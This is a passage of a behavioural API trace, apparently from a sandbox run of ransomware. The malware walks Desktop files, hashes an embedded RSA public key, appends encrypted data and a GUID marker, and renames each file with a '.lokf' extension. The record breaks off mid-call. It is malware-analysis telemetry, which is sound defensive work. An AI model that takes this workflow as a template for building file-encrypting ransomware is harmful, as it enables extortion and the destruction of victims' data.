KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.741] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.741] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.741] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.741] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.741] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.742] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.742] GetLastError () returned 0x0 [0058.742] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.742] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.742] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.742] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.742] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.742] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.742] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x366f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.742] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.742] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.742] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.742] CloseHandle (hObject=0x5cc) returned 1 [0058.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.743] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xrWMPRPigWwu3vXxOU1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrwmprpigwwu3vxxou1.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xrWMPRPigWwu3vXxOU1.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrwmprpigwwu3vxxou1.wav.lokf")) returned 1 [0058.744] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e17eff0, ftCreationTime.dwHighDateTime=0x1d4cb54, ftLastAccessTime.dwLowDateTime=0x1b3496f0, ftLastAccessTime.dwHighDateTime=0x1d4d2b2, ftLastWriteTime.dwLowDateTime=0x1b3496f0, ftLastWriteTime.dwHighDateTime=0x1d4d2b2, nFileSizeHigh=0x0, nFileSizeLow=0xb7aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZoOnp.swf", cAlternateFileName="")) returned 1 [0058.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.745] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZoOnp.swf") returned=".swf" [0058.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZoOnp.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zoonp.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.745] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=47018) returned 1 [0058.745] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.746] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb784, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.746] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.747] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb7aa, lpOverlapped=0x0) returned 1 [0058.747] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.747] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.747] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.747] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.750] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.750] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.750] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.750] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.750] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.750] GetLastError () returned 0x0 [0058.750] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.750] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.750] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.750] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.750] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.750] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.750] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.750] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.751] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb7aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.751] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.751] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.751] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.751] CloseHandle (hObject=0x5cc) returned 1 [0058.752] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.752] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.752] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZoOnp.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zoonp.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZoOnp.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zoonp.swf.lokf")) returned 1 [0058.753] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87a6ff20, ftCreationTime.dwHighDateTime=0x1d4c859, ftLastAccessTime.dwLowDateTime=0xa6491760, ftLastAccessTime.dwHighDateTime=0x1d4c6e7, ftLastWriteTime.dwLowDateTime=0xa6491760, ftLastWriteTime.dwHighDateTime=0x1d4c6e7, nFileSizeHigh=0x0, nFileSizeLow=0x16e06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyTEBApAQsy0 u.jpg", cAlternateFileName="ZYTEBA~1.JPG")) returned 1 [0058.753] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.753] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.753] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyTEBApAQsy0 u.jpg") returned=".jpg" [0058.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyTEBApAQsy0 u.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zytebapaqsy0 u.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.753] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=93702) returned 1 [0058.753] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.755] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16de0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.755] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.755] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.755] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x16e06, lpOverlapped=0x0) returned 1 [0058.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.756] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.756] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.757] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.757] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.757] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.757] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.757] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.757] GetLastError () returned 0x0 [0058.757] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.757] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.757] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.757] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.757] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.757] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.758] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.758] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.758] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16e06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.758] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.758] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.758] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.758] CloseHandle (hObject=0x5cc) returned 1 [0058.759] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.759] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.759] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyTEBApAQsy0 u.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zytebapaqsy0 u.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyTEBApAQsy0 u.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zytebapaqsy0 u.jpg.lokf")) returned 1 [0058.761] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacfc63a0, ftCreationTime.dwHighDateTime=0x1d4cc87, ftLastAccessTime.dwLowDateTime=0x1dec9680, ftLastAccessTime.dwHighDateTime=0x1d4c9a8, ftLastWriteTime.dwLowDateTime=0x1dec9680, ftLastWriteTime.dwHighDateTime=0x1d4c9a8, nFileSizeHigh=0x0, nFileSizeLow=0xff99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z_xjT1PbK9g5.mp3", cAlternateFileName="Z_XJT1~1.MP3")) returned 1 [0058.761] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.761] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.761] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_xjT1PbK9g5.mp3") returned=".mp3" [0058.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_xjT1PbK9g5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_xjt1pbk9g5.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.761] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=65433) returned 1 [0058.761] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.762] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xff73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.762] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.763] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.763] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xff99, lpOverlapped=0x0) returned 1 [0058.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.764] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.764] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.764] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.764] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.764] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.764] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.764] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.764] GetLastError () returned 0x0 [0058.764] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.765] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.765] UuidCreate (in: Uuid=0x9f4fa48 | out: 